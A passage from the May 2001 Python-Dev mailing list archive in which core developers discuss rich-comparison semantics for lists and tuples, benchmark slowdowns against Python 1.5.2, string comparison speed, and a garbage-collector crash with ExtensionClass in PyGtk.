TupleSlicing:                1163.05 ms   11.08 us   +75.29%
UnicodeMappings:             1232.80 ms   68.49 us       n/a
UnicodePredicates:           1294.95 ms    5.76 us       n/a
UnicodeProperties:           1410.45 ms    7.05 us       n/a
UnicodeSlicing:              1296.80 ms    7.41 us       n/a
------------------------------------------------------------------------
Average round time:         73388.00 ms                  n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(The compares not shown are below noise level (+-10%))

--
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From tim.one at home.com Wed May 16 21:07:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 15:07:49 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>
Message-ID:

[Tim]
> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

[Guido]
> Unclear what you're asking. The language doesn't require any
> particular semantics for sequence comparisons, but the language of
> course includes the tuple and list sequence types, and it describes
> (albeit lacking some rigorous detail) what comparisons for those do.

The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world. In a richcmp world, "compared lexicographically" is fuzzy enough that different implementations may do different things in good faith, competent users may disagree about what it means in specific cases, and programs may yield different results across implementations (or random CVS patches).
> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's guaranteed by the language and what's left up to the implementation. The full truth before was relatively simple. For a pair x, y of lists or tuples,

    def __cmp__(x, y):  # pretending this is a method on lists and tuples
        i = 0
        while i < len(x) and i < len(y):
            c = cmp(x[i], y[i])
            if c:
                return c
            i += 1
        return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each iteration. What's left unexplained is the treatment of recursive lists, and so the result of comparing them is a prime suspect for different behavior across implementations and releases.

In a richcmp world, there are several additional ways in which the above fails to capture the full truth, and each of those ways is another prime suspect for surprises. For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and that no element comparisons are to be performed after the leftmost element comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on elements, and that implementations are allowed (but not required) to skip all element comparisons when == or != comparison is given lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations must emulate other semantically significant details of the current implementation, like:

1. <=, <, > and >= comparisons will do at most one element comparison that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the long-winded details of how that works, incl. but not limited to the specific "first try ==, then try <, then try >" strategy used to simulate a pre-richcmp cmp() when all else fails.

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b        #1
1
>>> [a] < [b]    #2
0
>>> cmp(a, b)    #3
0
>>> a > b        #4
1
>>> a == b       #5
1
>>> a != b       #6
1
>>>

Which of those results are *required* by the language, and which merely *allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3 and/or #6 results differed, e.g., under Jython, or under CPython 2.3.

Indeed, I'm not even sure why #6 returns 1 under CPython today, and I've been staring at this a lot lately ... OK, #6 ends up getting resolved by comparing object addresses, which leaves "required or not?" fuzzy (i.e., *must* it be resolved that way? or is it implementation-defined?).

From guido at digicool.com Wed May 16 22:35:46 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 15:35:46 -0500
Subject: [Python-Dev] Rich comparison of lists and tuples
In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400."
References:
Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>

[Subject fixed]

[Tim shows there's a lot left to the imagination when trying to glean the meaning of list1==list2 using rich comparisons.]

I would like to break this down by defining the mapping between cmp() and rich comparisons. I propose:

- If cmp() is requested but not defined, and rich comparisons are defined, try ==, <, > in order; if all three yield false, act as if rich comparisons were not defined, and use the fallback comparison (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ

  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences. We could easily go the extra mile and define != to use only != on the items; but is this worth the extra complexity?
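The sequence part of the proposal above (a length shortcut for == and !=, then element == until the first false result, then a single ordering comparison on that element) can be modelled in a few lines of Python 3. This is a sketch under stated assumptions, not CPython's C code: seq_richcompare, OPS and Logged are hypothetical names, and the cmp()-related bullets are not modelled because Python 3 has no cmp(). The Logged element type records every comparison so the order of element comparisons is visible.

```python
import operator

# Python operator functions for each rich-comparison operator.
OPS = {"<": operator.lt, "<=": operator.le, "==": operator.eq,
       "!=": operator.ne, ">": operator.gt, ">=": operator.ge}


def seq_richcompare(x, y, op):
    """Hypothetical model of the proposed list/tuple comparison rules."""
    # Shortcut 1: for == and !=, sequences of different length differ.
    if op in ("==", "!=") and len(x) != len(y):
        return op == "!="
    # Shortcut 2: compare elements with == until a false result is found.
    i = 0
    while i < len(x) and i < len(y):
        if not x[i] == y[i]:
            break
        i += 1
    else:
        # Every overlapping element is equal: the lengths decide.
        return OPS[op](len(x), len(y))
    # x != y is simply "not x == y"; no != is ever applied to elements.
    if op == "==":
        return False
    if op == "!=":
        return True
    # One ordering comparison on the first unequal pair settles <, <=, >, >=.
    return OPS[op](x[i], y[i])


class Logged:
    """Element type that records every comparison made on it."""
    calls = []

    def __init__(self, v):
        self.v = v

    def __eq__(self, other):
        Logged.calls.append(("==", self.v, other.v))
        return self.v == other.v

    def __lt__(self, other):
        Logged.calls.append(("<", self.v, other.v))
        return self.v < other.v


if __name__ == "__main__":
    a = [Logged(1), Logged(2), Logged(3)]
    b = [Logged(1), Logged(5), Logged(0)]
    print(seq_richcompare(a, b, "<"), Logged.calls)
    # True [('==', 1, 1), ('==', 2, 5), ('<', 2, 5)]
```

Running the built-in a < b on the same lists under CPython 3 should record the same trace, which is one concrete reading of Tim's "strictly left-to-right" and "at most one non-== element comparison" points; the model makes no claim about how other implementations behave.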
--Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Wed May 16 22:37:43 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 15:37:43 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <20010516091942.A16455@glacier.fnational.com> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> <20010516091942.A16455@glacier.fnational.com> Message-ID: <15106.58647.495143.164636@beluga.mojam.com> Neil> In other words the GC is finding a tuple object that contains an Neil> element with a funny looking address (data segment?) and an Neil> op_type of NULL. Neil, I'm not sure if the funny looking address is a red herring or the key to the crime. I tried running with a breakpoint set in getBaseDictionary. The first couple times, the type parameter looked like $26 = (PyExtensionClass *) 0x80e7f60 $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7138 "ExtensionClass", ...} $28 = (PyExtensionClass *) 0x80e8060 $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x80d7209 "Base", ...} The third time it looked like $30 = (PyExtensionClass *) 0x4019f120 $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, tp_name = 0x4019dab2 "GObject", ...} The difference between the first two calls and the third one is that the first two objects are defined in ExtensionClass.o, which I currently statically link into the interpreter. The Gtk/GObject stuff is dynamically loaded into the running executable, so it's not surprising that it winds up at a wildly different address than the ExtensionClass stuff. 
My current best guess is that whatever object the tuple is referring to is declared static in the dynamically loaded Gtk stuff and has no business getting reclaimed by the collector. Sounds like a missing Py_INCREF somewhere. At the earliest point I've been able to check that object so far, its ob_type field is NULL. Skip From cpr at emsoftware.com Thu May 17 00:24:15 2001 From: cpr at emsoftware.com (Chris Ryland) Date: Wed, 16 May 2001 18:24:15 -0400 Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2> This talk is most entertaining! Highly recommended to you good folk, if only as a reinforcement of the good design principles embodied in Python (with the exception of print >> ;-). Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he wanted to give an example of a modern dynamic language (disclaiming a lot of knowledge about it). He mentioned it three or four times (usually positively), so it must be on the tip of his mind. -- Cheers! Chris Ryland Em Software, Inc. www.emsoftware.com From greg at cosc.canterbury.ac.nz Thu May 17 03:49:31 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 17 May 2001 13:49:31 +1200 (NZST) Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > You forgot the most important one ;-) ... > > "print 'My first Python program'".decode("python").run() Surely that should be: "'My first Python program'.encode('stdout')".decode("python").decode("run") Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg at cosc.canterbury.ac.nz +--------------------------------------+

From tim.one at home.com Thu May 17 03:56:56 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 21:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de> Message-ID:

[Martin v. Loewis]
> I'll put a patch on SF soon which does what you want to do, i.e. tries
> tp_compare as the first thing if tp_richcompare is not there.

Thanks! I'll check it out.

> Even with this patch, your code is faster if strings have a
> richcompare.

OK, from what I understand, that makes no sense. Does it to you? Assuming you're still talking about my silly little "ab" < "cd" test, then all the new code you put into your richcompare slot was a waste of cycles for that specific case: the new richcmp "objects the same type?" test would fail, then the new "pointers equal?" test would fail, then the new "op == Py_EQ?" test would fail, and then richcompare would give up and call string_compare() anyway. So I'm either missing something fundamental about what you did, or it's a timing anomaly on your box that defies obvious explanation ("but if I add three new tests that don't pay off, and make an extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
>
> With it, I get
>
> 0.710
> 0.720
> 0.720
> 0.710
> 0.710
> 0.720
> 0.710
> 0.710
> 0.710
> 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the difference is
> negligible, though.

Oh, I don't like giving up that easy on things that make no sense -- something else is happening here, although I've no idea what.
From tim.one at home.com Thu May 17 04:17:37 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 22:17:37 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> Message-ID:

[MAL]
> Since it is possible that these figures result from my specific
> machine setup, I'd like to know what other people see on their
> machines.

Is this the same machine where you were able to get 15% difference a few years ago by adding or removing an unreachable printf in ceval.c (or was that Vladimir)? If so, I bet it's degenerated to random 50% difference since then.

My Win98SE box is *astonishingly* useless for timings. Without fail, the first time I run pystone after a reboot yields a result a solid 50% higher than the second or subsequent times I run it (yes, it's major-league *slower* the second time). This is true across dozens of trials over several months, and across all versions of Python.

And simple little loops routinely vary in reported runtime by a factor of 3. I may have to dig my old Win95 box out of the packing crate <0.6 wink>.

None of that changes, of course, that the numbers you got are scary.

From jeremy at digicool.com Thu May 17 00:37:47 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 16 May 2001 18:37:47 -0400 (EDT) Subject: [Python-Dev] Performance compares In-Reply-To: <3B02C808.E3354D3F@lemburg.com> References: <3B02C808.E3354D3F@lemburg.com> Message-ID: <15107.315.19349.268345@slothrop.digicool.com>

As usual, the results you're reporting are quite different than what I see on my machine. I'd like to think that my machine is more normal than yours, but I expect we're both oddballs <0.2 wink>. I see basically the same slowdowns that you see, but the amount of the slowdown is quite a bit smaller. I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and the -O3 flag; ran pybench on an 800MHz P3 with 256MB RAM running Linux 2.2.17.
Python 1.5.2:
Pystone(1.1) time for 10000 passes = 0.85
This machine benchmarks at 11764.7 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 0.94
This machine benchmarks at 10638.3 pystones/second

PYBENCH 0.9

Benchmark: cvs (rounds=10, warp=100)

Tests:                      per run per oper.    diff *
-------------------------------------------------------
BuiltinFunctionCalls:      41.85 ms   1.64 us   +31.40%
CompareFloats:             39.60 ms   0.44 us   +13.96%
CompareFloatsIntegers:
CompareIntegers:
CompareLongs:              39.85 ms   0.44 us   +15.01%
CompareStrings:
CompareUnicode:
ConcatStrings:             48.65 ms   1.62 us   +46.76%
ConcatUnicode:
CreateInstances:           75.75 ms   9.02 us   +55.54%
CreateStringsWithConcat:   51.60 ms   1.29 us   +62.78%
CreateUnicodeWithConcat:
DictCreation:              87.80 ms   2.93 us  +115.72%
DictWithFloatKeys:
DictWithIntegerKeys:
DictWithStringKeys:
ForLoops:                  63.85 ms  31.93 us   -13.60%
IfThenElse:
ListSlicing:
NestedForLoops:            32.95 ms   0.66 us   +10.39%
NormalClassAttribute:
NormalInstanceAttribute:
PythonFunctionCalls:       48.85 ms   1.48 us   +11.78%
PythonMethodCalls:         38.95 ms   2.60 us   +12.09%
Recursion:
SecondImport:              37.80 ms   7.56 us   +65.79%
SecondPackageImport:       38.95 ms   7.79 us   +50.68%
SecondSubmoduleImport:     49.90 ms   9.98 us   +35.05%
SimpleComplexArithmetic:   58.95 ms   1.34 us   +74.67%
SimpleDictManipulation:
SimpleFloatArithmetic:
SimpleIntFloatArithmetic:
SimpleIntegerArithmetic:
SimpleListManipulation:    43.65 ms   0.81 us   +15.63%
SimpleLongArithmetic:      42.70 ms   1.29 us   +53.32%
SmallLists:                79.15 ms   1.55 us   +56.89%
SmallTuples:               66.65 ms   1.39 us   +43.03%
SpecialClassAttribute:
SpecialInstanceAttribute:
StringMappings:
StringPredicates:
StringSlicing:             39.00 ms   1.11 us   +28.71%
TryExcept:
TryRaiseExcept:            50.60 ms  16.87 us   +27.46%
TupleSlicing:              37.90 ms   1.80 us   +26.54%
UnicodeMappings:
UnicodePredicates:
UnicodeProperties:
UnicodeSlicing:
-------------------------------------------------------
Average round time:      3177.00 ms       n/a

*) measured against: 1.5.2 (rounds=10, warp=100)

(As MAL did, I
removed all the results where the difference is within +/- 10%.)

i-never-do-simple-complex-arithmetic-anyway-ly yr's, Jeremy

From martin at loewis.home.cs.tu-berlin.de Thu May 17 08:12:18 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:12:18 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>

> OK, from what I understand, that makes no sense. Does it to you?

After reviewing everything again, I think I now do: In the richcomp case, I have

    res = (*f1)(v, w, op);
    if (res != Py_NotImplemented)
        return res;

f1 is string_richcompare, so I get 2 function calls inside do_richcmp: one to string_richcompare, the other one to string_compare, as my optimizations are not triggered in your example. If I set tp_richcompare of strings to 0, I get past this code, and do

    c = (*f)(v, w);
    if (PyErr_Occurred())
        return NULL;
    return convert_3way_to_object(op, c);

Here, I get 3 function calls: f is string_compare, then PyErr_Occurred, finally convert_3way_to_object, which converts {-1,0,1} x Op -> {Py_True, Py_False}. Indeed, when I inline convert_3way_to_object, I get the same speed in both cases (with the remaining differences attributed to measurement and gcc doing register usage differently in both functions).

I'd still be in favour of giving strings a richcompare, since it allows to optimize what I think is the single most frequent case: Py_EQ on strings.
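Martin's accounting of the tp_compare fallback (run the three-way compare, check for an error, then map {-1, 0, 1} plus the opcode to a boolean) can be modelled in a few lines of Python. This is only an illustrative sketch: the function names echo the C ones but are hypothetical Python stand-ins, and Python-level calls cost far more than the C calls being counted, so it shows the shape of the path rather than its speed.

```python
# Opcodes modelled on CPython's Py_LT .. Py_GE constants (values 0..5).
PY_LT, PY_LE, PY_EQ, PY_NE, PY_GT, PY_GE = range(6)

# For each opcode, how to read a three-way result c (<0, 0 or >0).
_TESTS = {
    PY_LT: lambda c: c < 0,
    PY_LE: lambda c: c <= 0,
    PY_EQ: lambda c: c == 0,
    PY_NE: lambda c: c != 0,
    PY_GT: lambda c: c > 0,
    PY_GE: lambda c: c >= 0,
}

def three_way(a, b):
    """Old-style cmp(): returns -1, 0 or 1."""
    return (a > b) - (a < b)

def convert_3way_to_object(op, c):
    """Turn a three-way result into True/False for the given opcode."""
    return _TESTS[op](c)

def richcmp_via_3way(v, w, op, compare=three_way):
    """Fallback path: one three-way compare, then one conversion call.

    The C code also calls PyErr_Occurred() between the two; here an
    exception raised by `compare` simply propagates.
    """
    c = compare(v, w)
    return convert_3way_to_object(op, c)

print(richcmp_via_3way("ab", "cd", PY_LT))   # True
```

Inlining the conversion, as Martin did, removes one call per comparison from this path.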
With a control flow like

    if (a->ob_size != b->ob_size)
        goto False;
    if (a->ob_size == 0)
        goto True;
    if (a->ob_sval[0] != b->ob_sval[0])
        goto False;
    if (memcmp(a->ob_sval, b->ob_sval, a->ob_size))
        goto False;
    else
        goto True;

we can reduce the number of function calls.

Regards, Martin

From skip at pobox.com Thu May 17 08:42:41 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 01:42:41 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround Message-ID: <15107.29409.242342.200378@beluga.mojam.com>

Over the past couple days I've included python-dev on various messages in an ongoing thread about a segmentation violation I was getting with the new PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil Schemenauer, I finally know what's going on and I have a simple workaround that lets me get back to work. Here's a summary of the problem.

When defining ExtensionClass types, you need to create and initialize a PyExtensionClass struct. It looks something like so:

    PyExtensionClass PyGtkTreeSortable_Type = {
        PyObject_HEAD_INIT(NULL)
        0,                          /* ob_size */
        "GtkTreeSortable",          /* tp_name */
        sizeof(PyPureMixinObject),  /* tp_basicsize */
        ...
    };

Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would normally be the address of a type object (e.g. &PyType_Type). However, Jim Fulton pointed out that on Windows you can't get the address of &PyType_Type object at compile time. Accordingly, ExtensionClass provides a PyExtensionClass_Export macro whose responsibility is, in part, to set the ob_type field appropriately at runtime. (I'm not sure why this Windows nit doesn't afflict other type declarations like PyTuple_Type. I'm sure others will know why. I just accept Jim's word as gospel and move on...)

A problem arises if the garbage collector runs while the module initialization function is running, but before all the ob_type fields have been assigned their correct values.
In this case, a one-element tuple representing the bases of a particular PyGtk extension class was traversed by the garbage collector.

The workaround turns out to be exceedingly simple:

    import gc
    gc.disable()
    import gtk
    gc.enable()

I can handle doing that from Python code for the time being and will leave it up to others to decide how, if at all, ExtensionClass should be changed to correct the problem.

Skip

From martin at loewis.home.cs.tu-berlin.de Thu May 17 08:41:15 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Thu, 17 May 2001 08:41:15 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>

> 1. String objects are also equal despite being different objects,
> if their ob_sinterned pointers are equal and non-NULL. So if
> you're looking for every trick in & out of the book, that's
> another one.

That does not help. In the entire test suite, there are 0 instances where strings are compared which are not identical, but have equal ob_sinterned pointers.

> > So 5% of the calls are with identical strings, for which I can
> > immediately decide the outcome.
>
> But also at the cost of doing a fruitless compare and branch in 95%
> of calls.

Whether there's a fruitless branch depends on your compiler. With gcc 3, you can write

    if (__builtin_expect(a == b, 0)) {

and then the body of the if block will be moved out of the way of linear control flow.

> Any idea where those 800,000 virgin calls to oldcomp are coming
> from? That's a lot.

As far as I could trace it, most of them come from lookdict_string (at various locations inside this function).

> > #comps: 2949421
> > #memcmps: 917776
> >
> > So still, ca. 30% can be decided by first byte.
>
> Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
> 2949421, in which case I would have expected you to say that 70% can be
> decided by first byte.

Oops, you are right.
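The Py_EQ fast path Martin proposes checks, in order, the lengths, the empty case and the first byte before falling back to memcmp. A hypothetical Python model on bytes objects makes that decision order explicit. The `stats` counter is an addition for illustration only: it shows how many comparisons are settled before the full compare, which is the quantity behind the #comps/#memcmps figures quoted above. The final `a == b` stands in for memcmp.

```python
from collections import Counter

# Tally of which step decided each comparison (illustrative only).
stats = Counter()

def fast_string_eq(a: bytes, b: bytes) -> bool:
    """Equality test ordered like the proposed Py_EQ fast path."""
    if len(a) != len(b):        # different sizes can never be equal
        stats["size"] += 1
        return False
    if len(a) == 0:             # two empty strings
        stats["empty"] += 1
        return True
    if a[0] != b[0]:            # first byte differs: no memcmp needed
        stats["first_byte"] += 1
        return False
    stats["memcmp"] += 1        # only now do the full comparison
    return a == b               # stands in for memcmp(...) == 0
```

With this ordering, the full compare runs only for equal-length, non-empty strings that agree in their first byte.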
> It's clearer that this is going to hurt sorting (& bisect etc), by > adding yet another layer of function call to get Py_LT resolved (as > for dict compares too, the string richcmp can't do anything to speed > up Py_LT that string oldcmp can't do just as efficiently -- indeed, > that's the great advantage oldcmp's "compare first character" test > had: that *can* decide Py_LT in one byte much of the time (but > length comparison cannot)). So to support sorting better, I should special-case Py_LT in string_richcompare also, to avoid the function call ?-) > Note too earlier mail about how adding a richcmp slot to strings will > suddenly slow cmp(string1, string2) (which is the usual way to program a > search tree, because cmp() *used* to call a string comparison routine only > once; but after adding a richcmp slot, each cmp(string1, string2) will call > the richcmp slot from 1 thru 3 times (data-dependent)). Yes, that is a serious problem. Fortunately, very few calls in my programs go to string_compare through cmp() now. But then, your programs are different, of course... Regards, Martin From mal at lemburg.com Thu May 17 08:54:37 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 08:54:37 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <3B0375AD.24E039B0@lemburg.com> skip at pobox.com wrote: > > Over the past couple days I've included python-dev on various messages in an > ongoing thread about a segmentation violation I was getting with the new > PyGtk2 wrappers. With some excellent assistance from the GC maestro, Neil > Schemenauer, I finally know what's going on and I have a simple workaround > that lets me get back to work. Here's a summary of the problem. > > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. 
It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime. (I'm not sure why this Windows nit > doesn't afflict other type declarations like PyTuple_Type. I'm sure others > will know why. I just accept Jim's word as gospel and move on...) > > A problem arises if the garbage collector runs while the module > initialization function is running, but before all the ob_type fields have > been assigned their correct values. In this case, a one-element tuple > representing the bases of a particular PyGtk extension class was traversed > by the garbage collector. I wonder how the GC collector could "see" the type object before it has been initialized... since PyGtkTreeSortable_Type is a static C array and not a known PyObject until you add it to some Python dictionary as type object or use it for creating instances, it seems strange that the GC collector can reach out for it and get hit by the fact that it is not yet properly initialized. Some logic in PyExtensionClass_Export() or the GTK module must be twisted. > The workaround turns out to be exceedingly simple: > > import gc > gc.disable() > import gtk > gc.enable() > > I can handle doing that from Python code for the time being and will leave > it up to others to decide how, if at all, ExtensionClass should be changed > to correct the problem. 
-- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Thu May 17 09:00:20 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Thu, 17 May 2001 09:00:20 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Skip wrote: > When defining ExtensionClass types, you need to create and initialize a > PyExtensionClass struct. It looks something like so: > > PyExtensionClass PyGtkTreeSortable_Type = { > PyObject_HEAD_INIT(NULL) > 0, /* ob_size */ > "GtkTreeSortable", /* tp_name */ > sizeof(PyPureMixinObject), /* tp_basicsize */ > ... > }; > > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. It would > normally be the address of a type object (e.g. &PyType_Type). However, Jim > Fulton pointed out that on Windows you can't get the address of &PyType_Type > object at compile time. Accordingly, ExtensionClass provides a > PyExtensionClass_Export macro whose responsibility is, in part, to set the > ob_type field appropriately at runtime footnote: this is usually done in the module init function, *before* the call to Py_InitModule. see: http://www.python.org/doc/FAQ.html#3.24 if the garbage collector can run after Python calls a module's init- function, but before that module calls back into Python, anything can happen... 
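Skip's interim workaround (disable the collector around the import, then re-enable it) can be made a little more robust with a context manager that restores the collector's previous state even if the import raises. This is a sketch, not something PyGtk or the standard library provides; the helper name `gc_paused` is hypothetical. As Fredrik notes, the real fix is for the extension to finish setting up its type objects before anything can reach them; this only keeps the collector out of that window.

```python
import gc
from contextlib import contextmanager

@contextmanager
def gc_paused():
    """Temporarily disable the cyclic garbage collector.

    Restores the previous state on exit, so nesting is harmless and an
    exception inside the block cannot leave the collector switched off.
    """
    was_enabled = gc.isenabled()
    gc.disable()
    try:
        yield
    finally:
        if was_enabled:
            gc.enable()

# Usage, for an extension module that is unsafe to import while the
# collector might run (the module name is only an example):
#
#     with gc_paused():
#         import gtk
```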
Cheers /F From skip at pobox.com Thu May 17 09:04:06 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 02:04:06 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <3B0375AD.24E039B0@lemburg.com> References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> Message-ID: <15107.30694.131193.989215@beluga.mojam.com> mal> I wonder how the GC collector could "see" the type object before it mal> has been initialized... since PyGtkTreeSortable_Type is a static C mal> array and not a known PyObject until you add it to some Python mal> dictionary as type object or use it for creating instances, it mal> seems strange that the GC collector can reach out for it and get mal> hit by the fact that it is not yet properly initialized. It is actually PyGtkWidget_Type that is not yet initialized when it is placed in the bases tuple for one of its subclasses. GC traverses that tuple, then dives into each element. It hits the PyGtkWidget_Type object, whose ob_type field has not yet been initialized. The actual object whose bases tuple is being traversed is (in all the crashes I encountered), GdkDragContext. The ordering of the registration calls could perhaps be reordered. Currently GdkDragContext is patched up before GtkWidget, its base class. This code is generated by James Henstridge's wrapper code generator, so perhaps he can maintain the necessary class hierarchy relationships and insure that base classes are initialized before their subclasses. 
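Having the wrapper generator initialize base classes before their subclasses amounts to emitting the type registrations in topological order of the class hierarchy. A minimal Python sketch of that ordering follows. The `init_order` function and the `hierarchy` dictionary are hypothetical; the hierarchy is a simplified one using class names from this thread, not PyGtk's real class tree.

```python
def init_order(bases):
    """Return class names so that every base precedes its subclasses.

    `bases` maps a class name to the list of its direct base names.
    Raises ValueError if the hierarchy contains a cycle.
    """
    order, state = [], {}          # state: 1 = visiting, 2 = done

    def visit(name):
        if state.get(name) == 2:
            return
        if state.get(name) == 1:
            raise ValueError("cycle in class hierarchy at %r" % name)
        state[name] = 1
        for base in bases.get(name, ()):
            visit(base)            # bases are initialized first
        state[name] = 2
        order.append(name)

    for name in bases:
        visit(name)
    return order

# Simplified, hypothetical hierarchy, listed in the problematic order
hierarchy = {
    "GdkDragContext": ["GtkWidget"],
    "GtkWidget": ["GObject"],
    "GObject": [],
}
print(init_order(hierarchy))   # ['GObject', 'GtkWidget', 'GdkDragContext']
```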
Skip From skip at pobox.com Thu May 17 09:07:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 17 May 2001 02:07:15 -0500 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid> References: <15107.29409.242342.200378@beluga.mojam.com> <00c101c0de9f$0a6c4d10$e46940d5@hagrid> Message-ID: <15107.30883.680397.280556@beluga.mojam.com> Fredrik> footnote: this is usually done in the module init function, Fredrik> *before* the call to Py_InitModule. see: Fredrik> http://www.python.org/doc/FAQ.html#3.24 Fredrik> if the garbage collector can run after Python calls a module's Fredrik> init- function, but before that module calls back into Python, Fredrik> anything can happen... Thanks for pointing that out. Py_InitModule is indeed called before the fixup occurs. Skip From mal at lemburg.com Thu May 17 09:09:38 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 17 May 2001 09:09:38 +0200 Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround References: <15107.29409.242342.200378@beluga.mojam.com> <3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com> Message-ID: <3B037932.476F475A@lemburg.com> skip at pobox.com wrote: > > mal> I wonder how the GC collector could "see" the type object before it > mal> has been initialized... since PyGtkTreeSortable_Type is a static C > mal> array and not a known PyObject until you add it to some Python > mal> dictionary as type object or use it for creating instances, it > mal> seems strange that the GC collector can reach out for it and get > mal> hit by the fact that it is not yet properly initialized. > > It is actually PyGtkWidget_Type that is not yet initialized when it is > placed in the bases tuple for one of its subclasses. GC traverses that > tuple, then dives into each element. It hits the PyGtkWidget_Type object, > whose ob_type field has not yet been initialized. 
